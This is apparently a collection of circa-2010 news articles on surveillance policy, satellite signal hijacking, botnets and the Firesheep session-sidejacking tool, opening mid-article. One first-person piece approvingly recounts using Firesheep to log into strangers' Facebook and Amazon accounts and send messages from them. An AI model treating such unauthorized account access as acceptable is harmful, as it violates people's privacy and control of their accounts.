“The lesson of Clipper is that the N.S.A. is really not good at what it does, and its desire to eavesdrop overwhelms its ability to protect, and puts at risk U.S. security,” Rotenberg said. “The N.S.A. wants security, sure, but it also wants to get to capture as much as it can. Its view is you can get great security as long as you listen in.” Rotenberg added, “General Alexander is not interested in communication privacy. He’s not pushing for encryption. He wants to learn more about people who are on the Internet”—to get access to the original internal protocol, or I.P., addresses identifying the computers sending e-mail messages. “Alexander wants user I.D. He wants to know who you are talking to.”

Rotenberg concedes that the government has a role to play in the cyber world. “We privacy guys want strong encryption for the security of America’s infrastructure,” he said. He also supports Howard Schmidt in his willingness to mandate encryption for the few industries whose disruption could lead to chaos. “Howard is trying to provide a reasoned debate on an important issue.”

Whitfield Diffie, the encryption pioneer, offered a different note of skepticism in an e-mail to me: “It would be easy to write a rule mandating encryption but hard to do it in such a way as to get good results. To make encryption effective, someone has to manage and maintain the systems (the way N.S.A. does for D.O.D. and, to a lesser extent, other parts of government). I think that what is needed is more by way of standards, guidance, etc., that would make it easier for industry to implement encryption without making more trouble for itself than it saves.”

More broadly, Diffie wrote, “I am not convinced that lack of encryption is the primary problem. The problem with the Internet is that it is meant for communications among non-friends.”

What about China? Does it pose such a threat that, on its own, it justifies putting cyber security on a war footing? The U.S. has long viewed China as a strategic military threat, and as a potential adversary in the sixty-year dispute over Taiwan. Contingency plans dating back to the Cold War include calls for an American military response, led by a Navy carrier group, if a Chinese fleet sails into the Taiwan Strait. “They’ll want to stop our carriers from coming, and they will throw whatever they have in cyber war—everything but the kitchen sink—to blind us, or slow our fleet down,” Admiral McVadon, the retired defense attaché, said. “Our fear is that the Chinese may think that cyber war will work, but it may not. And that’s a danger because it”—a test of cyber warfare—“could lead to a bigger war.”

However, the prospect of a naval battle for Taiwan and its escalation into a cyber attack on America’s domestic infrastructure is remote. Jonathan Pollack, an expert on the Chinese military who teaches at the Naval War College in Newport, Rhode Island, said, “The fact is that the Chinese are remarkably risk-averse.” He went on, “Yes, there have been dustups, and the United States collects intelligence around China’s border, but there is an accommodation process under way today between China and Taiwan.” In June, Taiwan approved a trade agreement with China that had, as its ultimate goal, a political rapprochement. “The movement there is palpable, and, given that, somebody’s got to tell me how we are going to find ourselves in a war with China,” Pollack said.

Many long-standing allies of the United States have been deeply engaged in cyber espionage for decades. A retired four-star Navy admiral, who spent much of his career in signals intelligence, said that Russia, France, Israel, and Taiwan conduct the most cyber espionage against the U.S. “I’ve looked at the extraordinary amount of Russian and Chinese cyber activity,” he told me, “and I am hard put to it to sort out how much is planning for warfare and how much is for economic purposes.”

The admiral said that the U.S. Navy, worried about budget cuts, “needs an enemy, and it’s settled on China,” and that “using what your enemy is building to justify your budget is not a new game.”

There is surprising unanimity among cyber-security experts on one issue: that the immediate cyber threat does not come from traditional terrorist groups like Al Qaeda, at least, not for the moment. “Terrorist groups are not particularly good now in attacking our computer system,” John Arquilla told me. “They’re not that interested in it—yet. The question is: Do vulnerabilities exist inside America? And, if they do, the terrorists eventually will exploit them.” Arquilla added a disturbing thought: “The terrorists of today rely on cyberspace, and they have to be good at cyber security to protect their operations.” As terrorist groups get better at defense, they may eventually turn to offense.

Jeffrey Carr, a Seattle-based consultant on cyber issues, looked into state and non-state cyber espionage throughout the recent conflicts in Estonia and Georgia. Carr, too, said he was skeptical that China or Russia would mount a cyber-war attack against the United States. “It’s not in their interest to hurt the country that is feeding them money,” he said. “On the other hand, it does make sense for lawless groups.” He envisaged “five- or six-year-old kids in the Middle East who are working on the Internet,” and who would “become radicalized fifteen- or sixteen-year-old hackers.” Carr is an advocate of making all Internet service providers require their customers to use verifiable registration information, as a means of helping authorities reduce cyber espionage.

Earlier this year, Carr published “Inside Cyber Warfare,” an account, in part, of his research into cyber activity around the world. But he added, “I hate the term ‘cyber war.’ ” Asked why he used “cyber warfare” in the title of his book, he responded, “I don’t like hype, but hype sells.”

Why not ignore the privacy community and put cyber security on a war footing? Granting the military more access to private Internet communications, and to the Internet itself, may seem prudent to many in these days of international terrorism and growing American tensions with the Muslim world. But there are always unintended consequences of military activity—some that may take years to unravel. Ironically, the story of the EP-3E aircraft that was downed off the coast of China provides an example. The account, as relayed to me by a fully informed retired American diplomat, begins with the contested Presidential election between Vice-President Al Gore and George W. Bush the previous November. That fall, a routine military review concluded that certain reconnaissance flights off the eastern coast of the former Soviet Union—daily Air Force and Navy sorties flying out of bases in the Aleutian Islands—were redundant, and recommended that they be cut back.

“Finally, on the eve of the 2000 election, the flights were released,” the former diplomat related. “But there was nobody around with any authority to make changes, and everyone was looking for a job.” The reality is that no military commander would unilaterally give up any mission. “So the system defaulted to the next target, which was China, and the surveillance flights there went from one every two weeks or so to something like one a day,” the former diplomat continued. By early December, “the Chinese were acting aggressively toward our now increased reconnaissance flights, and we complained to our military about their complaints. But there was no one with political authority in Washington to respond, or explain.” The Chinese would not have been told that the increase in American reconnaissance had little to do with anything other than the fact that inertia was driving day-to-day policy. There was no leadership in the Defense Department, as both Democrats and Republicans waited for the Supreme Court to decide the fate of the Presidency.

The predictable result was an increase in provocative behavior by Chinese fighter pilots who were assigned to monitor and shadow the reconnaissance flights. This evolved into a pattern of harassment in which a Chinese jet would maneuver a few dozen yards in front of the slow, plodding EP-3E, and suddenly blast on its afterburners, soaring away and leaving behind a shock wave that severely rocked the American aircraft. On April 1, 2001, the Chinese pilot miscalculated the distance between his plane and the American aircraft. It was a mistake with consequences for the American debate on cyber security that have yet to be fully reckoned.

No Terror Arrests in 100,000 Police Counter-Terror Searches, Figures Show

Just 504 people out of 101,248 searches under counter-terror powers last year were held for any offence, Home Office reveals
Alan Travis

Rise in 'stop and search' complaints - report The 101,248 searches under counter-terrorism powers in 2009/10 was 60% down on the previous year. Photograph: David Parry/PA

More than 100,000 people were stopped and searched by police under counter-terrorism powers last year but none of them were arrested for terrorism-related offences, according to Home Office figures published today.

The statistics show that 504 people out of the 101,248 searches were arrested for any offence – an arrest rate of 0.5%, compared with an average 10% arrest rate for street searches under normal police powers.

The figures prompted the former Conservative home affairs spokesman David Davis to call for the controversial policy to be scrapped.

"This astonishing fact of no terrorism-related arrests, let alone prosecutions or convictions, in over 100,000 stop and searches, demonstrates what a massively counter-productive policy this is," said Davis.

"A policy which fuels resentment and antagonism amongst minority communities without achieving a single terrorist conviction serves only to help our enemies and increase the terrorism threat."

The annual Home Office bulletin on the use of terror powers also discloses for the first time that more than 85,000 people were questioned by police at airports and other border points in the last years under counter-terrorist legislation. More than 2,600 of them were held for more than an hour.

As Home Office ministers consider proposals to cut the current 28-day limit on detention without charge of terror suspects, the official figures reveal that nobody has been held longer than 14 days for the last two years before being charged or released.

The annual bulletin on the police use of counter-terrorism powers shows that, since the 9/11 attacks, 1,834 people have been arrested in Britain in connection with terrorism-related incidents.

A total of 1,000 of those suspects have been released without charge, 422 charged with terrorism-related offences, 228 with other crimes, and the remaining 184 dealt with by other action such as being transferred to the immigration authorities.

So far, 237 of those charged with terrorism-related offences have been convicted. There are 14 outstanding trials yet to be completed.

The Home Office figures show that 102 convicted terrorists were serving prison sentences – 84 of them Muslims – as of 31 March this year, with a further 25 released into the community after finishing their sentences in the last year.

The bulletin shows that the use of section 44 counter-terrorism stop and searches, which allowed the police to randomly search anyone without grounds for suspicion in a designated area, declined sharply in advance of a ruling earlier this year by the European court of human rights that it was unlawful.

There were 101,248 searches under these powers in 2009/10, a 60% reduction on the previous year. The vast majority were carried out by the Metropolitan police in London or by the British Transport police. The use of section 44 powers peaked at more than a quarter of a million searches in 2008/09 in the aftermath of the Haymarket bomb attack in London in 2007.

The figures show that 506 people were arrested as a result of the 101,248 searches and none of these arrests had anything to do with terrorism. Home Office statisticians say this arrest rate of 0.5% of searches under counter-terrorism powers compares with an average 10% arrest rate for searches under normal police powers.

The home secretary, Theresa May, is considering the future of section 44 under the review of counter-terrorism legislation which is due to report in the next few weeks. Since the Strasbourg ruling a residual power under section 44 has remained in force to allow the police to conduct random searches of vehicles.

The police use of section 44 to stop and search on the street has further declined since March, when the official figures were collected. An ethnic breakdown of the 101,248 searches shows that 59% of those stopped were white and 27% were black or Asian.

The counter-terrorism review is also looking at whether the 28-day limit for detaining terror suspects without charge should be retained, with Liberal Democrats pressing to reduce it to 14 days. The figures show that since the limit was raised from 14 to 28 days in 2006, 11 people have been detained for longer than 14 days. In the last two years nobody has been held without charge for longer than 14 days.

Privacy Commissioner Slams Data Retention
Josh Taylor and Darren Pauli

The Australian Privacy Commissioner Timothy Pilgrim has slammed the Federal Government's proposed data retention law and called for an inquiry to ensure data is not mishandled if the plan goes ahead.

Such a regime would require companies providing internet access to log and retain customer's private web browsing history for law enforcement to access when needed.

Speaking in Senate Estimates today, Pilgrim said he does not support the plan.

"The Privacy Commissioner does not support the collection of information on the chance that it would be useful later," Pilgrim said. "If you have data sitting around for a long time there is great risk that something could happen to it.

"We need to understand what is the exact problem being responded to [that] response is proportionate to the risk."

Pilgrim said the office has entered preliminary discussions on data retention with the Federal Attorney's-General Department and called for a "privacy assessment" should the proposal become legislation.

He said the scheme must be carefully assessed and exemptions should be minimised.

"What will be the accountability mechanisms … are there mechanisms to ensure it will be held securely and not beyond the expectation of the user?"

Pilgrim's comments are parting shots and the last comments he will make in estimates before his office is moved under the wing of the Australian Information Commissioner. His office will sit alongside the yet to be appointed Freedom of Information Commissioner.

Representatives from internet giant Google were also grilled as to whether the company had been briefed on the government's data retention policy.

"Has Google been consulted in the development of the Australian Government's data retention policy?" Greens Senator Scott Ludlam asked, noting the policy would be a recurring theme of the day.

"We haven't been involved in those discussions but obviously we've seen media reports and we are aware those discussions are going on," Iarla Flynn, Google's public policy and government affairs spokesperson said, adding that any plan would need to balance privacy and law enforcement requirements.

"Our view is that any requirement to retain data to enable the investigation, detection and prosecution of serious crimes has to be proportionate to the resultant privacy impact and anonymity loss for internet users as well as the cost to internet providers to implement that," he said.

Ludlam, Labor Senator Doug Cameron and Liberal Senator Mary Jo Fisher also questioned the representatives about how it collects data on individuals and the transparency of measures it offers for users to erase information it holds on them. Using the example of a Gmail account, Google public policy and government affairs spokesperson Istar Vij used the example of deleting an email from a Gmail account.

"Once it's deleted and gone from our backup servers, it's gone," she said.

"From the entire techostratasphere?" Fisher asked.

"If I stored data with my Gmail account and I deleted it, it will be gone," Vij replied.

Fisher also asked the company if it performs the common task of collecting cookies to track web user histories.

How To Hack The Sky

A Spanish researcher demos new satellite-hijacking tricks with cybercriminal potential.
Andy Greenberg

Satellites can bring a digital signal to places where the Internet seems like a miracle: off-the-grid desert solar farms, the Arctic or an aircraft carrier at sea. But in beaming data to and from the world's most remote places, satellite Internet may also offer its signal to a less benign recipient: any digital miscreant within thousands of miles.

In a presentation at the Black Hat security conference in Arlington, Va., Tuesday, Spanish cybersecurity researcher Leonardo Nve presented a variety of tricks for gaining access to and exploiting satellite Internet connections. Using less than $75 in tools, Nve, a researcher with security firm S21Sec, says that he can intercept Digital Video Broadcast (DVB) signals to get free high-speed Internet. And while that's not a particularly new trick--hackers have long been able to intercept satellite TV or other sky-borne signals--Nve also went a step further, describing how he was able to use satellite signals to anonymize his Internet connection, gain access to private networks and even intercept satellite Internet users' requests for Web pages and replace them with spoofed sites.

"What's interesting about this is that it's very, very easy," says Nve. "Anyone can do it: phishers or Chinese hackers … it's like a very big Wi-Fi network that's easy to access."

In a penetration test on a client's network, Nve used a Skystar 2 PCI satellite receiver card, a piece of hardware that can be bought on eBay ( EBAY - news - people ) for $30 or less, along with open source Linux DVB software applications and the network data analysis or "sniffing" tool Wireshark.

Exploiting that signal, Nve says he was able to impersonate any user connecting to the Internet via satellite, effectively creating a high-speed, untraceable anonymous Internet connection that that can be used for nefarious online activities.

Nve also reversed the trick, impersonating Web sites that a satellite user is attempting to visit by intercepting a Domain Name System (DNS) request--a request for an Internet service provider (ISP) to convert a spelled out Web site name into the numerical IP address where it's stored--and sending back an answer faster than the ISP. That allows him to replace a Web site that a user navigates to directly with a site of his choosing, creating the potential for undetectable cybercrime sites that steal passwords or installs malicious software.

In his tests on the client's network, Nve says he was also able to hijack signals using GRE or TCP protocols that enterprises use to communicate between PCs and servers or between offices, using the connections to gain access to a corporation or government agency's local area network.

The Barcelona-based researcher tested his methods on geosynchronous satellites aimed at Europe, Africa and South America. But he says there's little doubt that the same tricks would work on satellites facing North America or anywhere else.

What makes his attacks possible, Nve says, is that DVB signals are usually left unencrypted. That lack of simple security, he says, stems from the logistical and legal complications of scrambling the signal, which might make it harder to share data among companies or agencies and--given that a satellite signal covers many countries--could run into red tape surrounding international use of cryptography. "Each [country] can have its own law for crypto," says Nve. "It's easier not to have encryption at the DVB layer."

Nve isn't the first to show the vulnerability of supposedly secure satellite connections. John Walker, a British satellite enthusiast, told the BBC in 2002 that he could watch unencrypted NATO video feeds from surveillance sorties in the Balkans. And the same lack of encryption allowed insurgents to hack into the video feed of unmanned U.S. drone planes scouting Afghanistan, the Wall Street Journal reported in December.

In fact, the techniques that Nve demonstrated are probably known to other satellite hackers but never publicized, says Jim Geovedi, a satellite security researcher and consultant with the firm Bellua in Indonesia. He compares satellite hacking to early phone hacking or "phreaking," a practice that's not well protected against but performed by only a small number of people worldwide. "This satellite hacking thing is still considered blackbox knowledge," he wrote in an e-mail to Forbes. "I believe there are many people out there who conduct similar research. They may have some cool tricks but have kept them secret for ages."

At last year's Black Hat D.C. conference, British cybersecurity researcher Adam Laurie demonstrated how he intercepts satellite signals with techniques similar to Nve, using a DreamBox satellite receiver and Wireshark. But Nve argues that his method is far cheaper--Laurie's DreamBox setup cost around $750--and that he's the first to demonstrate satellite signal hijacking rather than mere interception.

"I'm not just talking about watching TV," says Nve. "I'm talking about doing some very scary things."

The Rise of the Small Botnet

Smaller botnets are cheaper and easier to build out and operate, and criminals have already realized that large-scale botnets attract unwanted attention
Ram Mohan

In September, law enforcement agencies in the US and Europe announced that they had cracked a major ZeuS botnet operation allegedly responsible for the theft of over $70 million. Operation Trident Breach saw US agencies including the FBI, as well as police in the UK, Netherlands and Ukraine, charge or arrest the alleged gang ringleaders, along with over 100 people said to be the "money mules" responsible for electronically receiving and passing on the stolen cash. The sophisticated criminal operation was said to have compromised computers in at least 390 small and medium-sized businesses in the US alone, along with individuals and other organizations, in order to attempt to steal at least $220 million from bank accounts.

Reports of such law enforcement crackdowns are increasingly common, but they represent merely the tip of the iceberg in addressing the real underlying problem. Botnets controlled by criminal enterprises all over the world continue to multiply at a steep rate, and it is now arguably the smaller, harder-to-trace operations that organizations should be the most worried about. Not only are smaller botnets cheaper and easier to build out and operate, but criminals have already realized that large-scale botnet activity attracts unwanted attention, and not just of law enforcement. Late last year, an ad hoc coalition of security researchers seized the command and control servers at the center of the Mariposa botnet, essentially killing the beast by cutting off its head. By February this year the alleged mastermind behind the network had been arrested and charged, tracked down after his repeated attempts to regain control of his bots. While in control of the Mariposa C&C servers, the researchers discovered that over 12 million unique IP addresses, all compromised PCs, were attempting to connect, a startling illustration of just how large botnets have become these days.

Botnet management is an increasingly commoditized, automated and sophisticated activity that can put worryingly powerful technological weapons into the hands of criminals with little technical knowledge, and at a price point that won't hurt their wallet. Botnets smaller than those of the scale of Mariposa hide under the radar of major law enforcement efforts, and are becoming numerous enough to cause real concern.

Cybercrime Using Botnets

The development of the black market for botnet technology and services mirrors legitimate Internet industries. Today, would-be criminals can choose to buy the latest version of kits such as ZeuS, or even ready-made botnets, for as little as $2,500, which is not a large sum when you consider that the potential rewards could quickly add up to tens or even hundreds of thousands of dollars. Cracked versions of such tools are sometimes made available for free, which has caused some toolkit developers to add DRM protections to their software. Indeed, this industry has even taken advantage of the ease and scalability of cloud-based business models allowing customers to “rent” their fully hosted botnet solutions for as little as $60 a day. A one-hour DDoS attack can be rented for the price of a couple of cups of coffee, especially if you are a repeat customer who yields a recurring revenue stream for the botnet merchant. Botnet rental can even come with service-level agreements and customized control panels; the black market is almost as sophisticated as many legitimate online marketplaces.

Even if an enterprise is successful in preventing its endpoints being added to a botnet, it remains exposed to the external threat of other botnet-related attacks, such as DDoS, which are much harder to mitigate. While high-profile DDoS-related outages at highly trafficked sites such as Facebook and Twitter make headlines on a regular basis, thousands of similar attacks against targets small and large are recorded every week. As the number of botnets increase, so too does the amount of bandwidth available to the attackers controlling them. The largest single reported DDoS attack this year weighed in at a hefty 49 Gbps, more than enough to take all but the best-provisioned handful of sites in the world offline and to cause serious problems at core infrastructure bottlenecks.

So what can your business do to defend yourself from the threats that botnets pose to your daily business? First, smaller enterprises can find refuge in the Cloud. Relocating some critical functions to highly capable, redundantly provisioned cloud application providers can offer a "safety in numbers" defense against DDoS that would be prohibitively expensive if managed in-house. Larger organizations need to assess the capabilities of their data centers or hosting providers and ensure that critical infrastructure services such as DNS are not overlooked and do not become single points of failure.

Botnets are the Swiss army knife of attack tools. Once a computer has been compromised with bot software, malicious hackers can leverage its bandwidth to send spam, host illegal content or execute distributed denial of service attacks. As Operation Trident Breach showed, they can also be used more covertly, to secretly record keystrokes, stealing banking passwords in order to transfer large sums to the criminals. ZeuS, currently the post popular botnet creation and control tool, is specifically designed to steal passwords and other sensitive data. Remarkably, less than half of ZeuS-based bot variants are detected, on average, by commercial anti-virus software. The 2008-era Conficker botnet is like an active volcano, ready to erupt at any time. This means that any organization, regardless of size, has a responsibility to educate its employees on external risks and proper behavior to mitigate infection and improve the security of the enterprise network.

Criminals no longer need large botnets comprising hundreds of thousands of compromised machines in order to shut down enterprises, or even important pieces of the Internet. Smaller botnets are more than enough to take down significant core pieces of national or corporate infrastructure. The ability of defenders to thwart these attacks by over-provisioning their networks does not increase proportionally with the disruptive power of botnet-driven DDoS attacks, which will grow as more Internet users come online in developing nations and fast broadband connections become available more cheaply to home users that are less educated in proper security behavior. This growing Provisioning Gap should be one of the biggest security concerns for enterprises today, as it has the potential to make the small botnets of tomorrow every bit as scary as the large botnets of today.

Firefox Extension Makes Social Network ID Spoofing Trivial
Zeljka Zorz

A simple-to-use Firefox plugin presented yesterday at Toorcon in San Diego has hit the security world with the realization that squabbles about Facebook's changing privacy settings and various privacy breaches simply miss the point.

"When it comes to user privacy, SSL is the elephant in the room," said Eric Butler, the developer of the extension in question, dubbed Firesheep. By installing and running it, anyone can "sniff out" the unencrypted HTTP sessions currently allowing users on that network segment to access social networks, online services and other website requiring a login, and simply hijack them and impersonate the user.

"As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed," explains Butler. "Double-click on someone, and you're instantly logged in as them."

It is not that this was impossible to do before the advent of Firesheep, but it included the use of some knowledge that average Internet users didn't have. "Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win," says Butler.

Whether he will succeed in pointing out the need of full end-to-end encryption and spur websites into action, it remains to be seen. Among the websites whose cookies Firesheep can identify are Facebook, Flickr, Amazon.com, bit.ly, Google, Twitter, Yahoo, WordPress, and many others.

As I write this, the extension has been downloaded some 8,000 times, and the number is rising by the second. Wouldn't it be amazing that an action such as this could bring about the realization of a more secure Internet?

How to Protect Against Firesheep Attacks

Security experts today suggested ways users can protect themselves against Firesheep, the new Firefox browser add-on that lets amateurs hijack users' access to Facebook, Twitter and other popular services via Wi-Fi.

Firesheep adds a sidebar to Mozilla's Firefox browser that shows when anyone on an open network -- such as a coffee shop's Wi-Fi network -- visits an insecure site.

A simple double-click gives a hacker instant access to logged-on sites ranging from Twitter and Facebook to bit.ly and Flickr.

Since researcher Eric Butler released Firesheep on Sunday, the add-on has been downloaded nearly 220,000 times.

"I was in a Peet's Coffee today, and someone was using Firesheep," said Andrew Storms, director of security operations at San Francisco-based nCircle Security. "There were only 10 people in there, and one was using it!"

But users aren't defenseless, Storms and several other experts maintained.

One way they can protect themselves against rogue Firesheep users, experts said on Tuesday, is to avoid public Wi-Fi networks that aren't encrypted and available only with a password.

However, Ian Gallagher, a senior security engineer with Security Innovation, argued that tosses out the baby with the bathwater. Gallagher is one of the two researchers who debuted Firesheep last weekend at a San Diego conference.

"While open Wi-Fi is the prime proving ground for Firesheep, it's not the problem," Gallagher said in a blog post earlier on Tuesday. "This isn't a vulnerability in Wi-Fi, it's the lack of security from the sites you're using."

Free, open Wi-Fi is not only taken for granted by many, but it's not the problem. There are plenty of low-risk activities one can do on the Internet at a public hotspot, including reading news or looking up the address of a nearby eatery.

So if Wi-Fi stays, what's a user to do?

The best defense, said Chet Wisniewski, a senior security adviser at antivirus vendor Sophos, is to use a VPN (virtual private network) when connecting to public Wi-Fi networks at an airport or coffee shop, for example.

While many business workers use a VPN to connect to their office network while they're on the road, consumers typically lack that secure "tunnel" to the Internet.

"But there are some VPN services that you can subscribe to for $5 to $10 month that will prevent someone running Firesheep from 'sidejacking' your sessions," Wisniewski said.

A VPN encrypts all traffic between a computer -- a laptop at the airport gate, for instance -- and the Internet in general, including the sites vulnerable to Firesheep hijacking. "It's as good a solution as there is," Wisniewski said, "and no different, really, than using encrypted Wi-Fi."

One provider, Strong VPN, prices its service starting at $7 per month or $55 per year.

Gallagher, however, warned that a VPN isn't a total solution. "That's just pushing the problem to that VPN or SSH endpoint," he said. "Your traffic will then leave that server just as it would when it was leaving your laptop, so anyone running Firesheep or other tools could access your data in the same way."

"A blind suggestion of 'use a VPN' doesn't really solve the problem and may just provide a false sense of security," he said.

Strong VPN disagreed. "Our servers are in a secure datacenter, so no one's going to be able to 'sniff' the traffic coming in or going out," a company spokesman countered. "All the traffic from, for example, your laptop in San Francisco, is encrypted when it goes to one of our U.S. servers."

Storms echoed Strong VPN's assertion. "I can see [Gallagher's point], that a VPN doesn't solve the root problem, which is on the service end," he said. "But although it's true that the traffic would be clear text when it leaves the VPN server for the site, it's very unlikely that someone would snoop that traffic."

Sean Sullivan, a security advisor with F-Secure, recommended Comodo's TrustConnect as "a VPN in all but name only." Comodo, a rival of F-Secure, sells the service for $7 per month or $50 annually.

If free is the object, there are options there, too, said Wisniewski, Sullivan and Gallagher, who pointed to a pair of free Firefox add-ons that force the browser to use an encrypted connection when it accesses certain sites.

One of those Firefox add-ons, HTTPS-Everywhere, provided by the Electronic Frontier Foundation (EFF), only works with a defined list of sites, including Twitter, Facebook, PayPal and Google's search engine.

The other choice, Force-TLS, serves the same purpose as the EFF's extension, but lets users specify which sites on which to enforce encryption.

However, other browsers, such as Microsoft's Internet Explorer and Google's Chrome, lack similar add-ons, leaving their users out in the cold.

"I expect that [Firesheep] will spur the EFF or others, maybe in the open source community, to some additional development [of such add-ons], maybe Chrome ports of those extensions," Sullivan said.

That could take months. In the meantime, Sullivan had another idea. "A MiFi device can encrypt [traffic], so with one you're always carrying your own Wi-Fi hotspot with you," he said.

MiFi isn't cheap, however. Verizon, for example, gives away the hardware but charges between $40 and $60 per month for the access to its 3G network.

Ultimately, moves users make to plug the holes Firesheep exposes are stop-gaps. The elephant in the room, said Butler and Gallagher as they defended the release of the add-on, is the lack of full encryption. And only the sites and services can fix that.

"The real story here is not the success of Firesheep but the fact that something like it is even possible," Butler wrote in his blog on Tuesday. "Going forward, the metric of Firesheep's success will quickly change from amount of attention it gains, to the number of sites that adopt proper security. True success will be when Firesheep no longer works at all."

But for the moment, even security professionals are worried. "I'm at the airport right now," Wisniewski told Computerworld. "And I'm wondering if someone is using Firesheep here. Maybe I should do a little 'shoulder browsing' to see if anyone has it running."

Source: http://www.computerworld.com/s/artic...pageN umber=2

How To Screw With Firesheep Snoops? Try FireShepherd
Andy Greenberg

The Web has been abuzz with warnings about Firesheep, a simple Firefox add-on that lets users steal cookies and snoop on the Facebook and Twitter activities of any fellow users on an unsecured wireless network.

Plenty of tools offer workarounds and protections for Firesheep’s data-sniffing trick, such as virtual private network tools and the EFF’s HTTPS Everywhere plug-in.

But for anyone who wants to do their fellow network users a favor and really screw with anyone using Firesheep, one Icelandic hacker has come up with a more aggressive solution: FireShepherd. Gunnar Atli Sigurdsson, a 21-year old electrical engineering student at the University of Iceland, designed the program to run on a user’s desktop and periodically jam the local wireless network with a string of junk characters that Sigurdsson says will instantly crash Firesheep when the snooping program reads them.

“It’s really basic,” he says. “It pretty much just floods the wireless network with packets that crush Firesheep and turns it off.”

By default, those jamming signals are broadcast every 400 milliseconds. But they can be adjusted to the user’s preference to best confuse and frustrate would-be Wifi spies.

Sigurdsson sympathizes with the mission of Firesheep’s creator, a security researcher who hoped to demonstrate the insecurity of accessing unsecured Wifi networks without encrypted connections. But now that more than 200,000 users have downloaded the program in just a few days, he says he’s grown uneasy with the results. “I really didn’t like the concept of everyone living in a house with nothing but windows,” he says.

Since Fireshepherd uses a vulnerability in Firesheep, someone may soon create a patch for the open-source program that nullifies Sigurdsson’s jamming technique. But if that happens, he says he’ll search out another vulnerability and update the tool. “Programs usually have more than one bug,” he says.

You can download FireShepherd here.

Herding Firesheep in New York City
Gary LosHuertos

There's been a lot of talk about Firesheep over the last few days. The free Firefox extension collects cookies that have been broadcast over an unprotected WiFi network without using SSL. You turn it on, it collects cookies for Facebook, Twitter, and 24 other sites (by default). Then, you can sidejack the account and gain access under the acquired identity.

This extension isn't shocking. If you're worth your weight as a developer, you've known this flaw has existed for a long time, right? But what about the rest of the world? What about the people who haven't heard about the newly accessible threat through their friends, through Engadget, through Slashdot, or through ABC ProNews7 in Amarillo?

I thought I'd spread the word and help some laymen out after work since there's a large Starbucks near my apartment. I dropped in, bought some unhealthy food, opened my laptop and turned on Firesheep. Less than one minute later, there were five or six identities sitting in the sidebar. Three of them were from Facebook.

This wasn't at all surprising; Firesheep is not magical, and anyone that's been to a Starbucks knows that a lot of people mindlessly refresh Facebook while sipping on their lattes. I thought I'd give it more time, so I listened to some music, talked to a few friends, and most importantly (and difficultly) did not navigate to anything sent over vanilla HTTP (including, of course, Facebook).

Around half an hour later, I'd collected somewhere between 20 and 40 identities. Since Facebook was by far the most prevalent (and contains more personal information than Twitter) I decided to send the users messages from their own accounts to warn them of their accounts' exposure. I drafted a friendly, generic message that stated the location of the Starbucks, what the vulnerability was, and how to avoid it. I sent messages to around 20 people.

I cleared the sidebar, took off my headphones, and waited. I heard one expletive muttered a few feet away, and wondered if my message was the cause. Over the next 15 minutes, I didn't hear anyone talk about what had happened (and folks at Starbucks are usually not ones to keep their conversations private). However, what I did see happen was a sharp decline in the number of identities I was collecting when I restarted Firesheep.

This was relieving -- these people got the message. Hopefully they'll tell their friends, hide their kids, hide their wives. I cleared the sidebar once again, and after another twenty minutes of mindless conversation I saw five familiar names had returned to my herd.

This was somewhat puzzling. Did they receive the first message? I logged into their accounts, and surely enough, they had. One of them was even on Amazon.com, which I had warned about in my first message. I targeted him first: I opened up his Amazon homepage, identified something he had recently looked at, and then sent him a "no, seriously" message on Facebook from his account including the fun fact about his music choices.

I cleared again, waited for ten minutes, and after resuming Firesheep's collection it appeared that he was gone. Yet the other four remained persistent. Perhaps, I thought, they thought the message was automatically generated and randomly targeted (despite mentioning their location within 100 feet). So, one last message was in order.

I drafted a very short message (perhaps the first was too long?) and sent it to the four, once again from their own accounts:

Really wasn't kidding about the insecurity thing. I won't send another message after this -- it's up to you to take your security seriously. You're at the [XYZ Street] Starbucks on an insecure connection, and absolutely anyone here can access your account with the right (free) tool.
Twenty minutes passed, and all four were still actively using Facebook. Again, I considered that they may not have received the second message, but after viewing their accounts it was clear that they had.

This is the most shocking thing about Internet security: not that we are all on a worldwide system held together with duct tape that has appalling security vulnerabilities; not that a freely available tool could collect authentication cookies; and certainly not that there are people unaware of either. What's absolutely incomprehensible is that after someone has been alerted to the danger (from their own account!) that they would casually ignore the warning, and continue about their day.

But, I kept my word and did not send another message. I packed my things, I walked around the store, and recognized several of the people I'd just introduced to their own vulnerability. I included no clues as to my identity, less because of fear of retribution, and more because invasion of privacy is all the more frightening when it is committed by an absolute stranger with no chance of discovering their identity.

On my way home, I considered what the experience meant about our society. No matter how many security measures we provide to the world, there will always be people who leave the door open, even after they've had an intruder. The weakest link in security has been, and always will be, the user's judgement.

Back at my apartment, I began to settle in -- only to realize that throughout the entire night, my fly had been wide open. Just another demonstration: we're all walking around with vulnerabilities we have yet to discover.

The Advantages of MiFi Cards Over Built-In 3G in Netbooks, iPads, e-Readers, and Other Mobile Devices
Ryan Faas

A built-in 3G connection may seem like a great feature, but could be limiting and costly in the long run.

Earlier this week, I touched on MiFi cards as an alternative to using public W-Fi networks as a way to avoid being a victim of Firesheep (a FireFox extension that makes it easy for anyone using a wireless network that doesn't require a password to hijack accounts/sessions of common social networking sites). That may be a good reason to consider a MiFi card, but the primary reason for purchasing one is that they allow you to connect to a mobile carrier's 3G or 4G network wherever you and to share that connection with up to five devices using Wi-Fi.

Usually MiFi cards are used by professionals on the road who need to connect their laptops to the Internet and who don't want to have to scramble trying to find a Starbucks (or other free Wi-Fi location) and who don't want to have to pay the typically high prices for Internet access in most chain hotels and airports. Since the devices work anywhere there's coverage, they also work while in a car, on a train, or in Wi-Fi-free locations.

An interesting comment from Sprint today illustrated some interesting advantages to MiFi cards as we move to a less laptop-centric mobile world in the new era of tablets. In an interview with GigaOm's Om Malik, Sprints CEO Dan Hesse noted that the iPad has been good for the company – a somewhat surprising statement from Spring considering the iPad 3G only works with AT&T in U.S. and couldn't connect to Sprint's CDMA network (or Verizon's) even if AT&T wasn't the exclusive carrier in this country.

What Hesse was referring to isn't the iPad 3G, it was the less expensive Wi-Fi only tablet. Sprint doesn't sell those iPads either, but did release its own iPad case this spring that ships with a Sprint Overdrive MiFi device (the case includes a pocket specifically designed to hold the Overdrive) that supports both 3G and significantly faster 4G network connections. So far, Sprint has rolled out 4G service to many large population centers before its national competitors, making its MiFi solution better for users who need fast connections than the iPad 3G or MiFi cards from other providers.

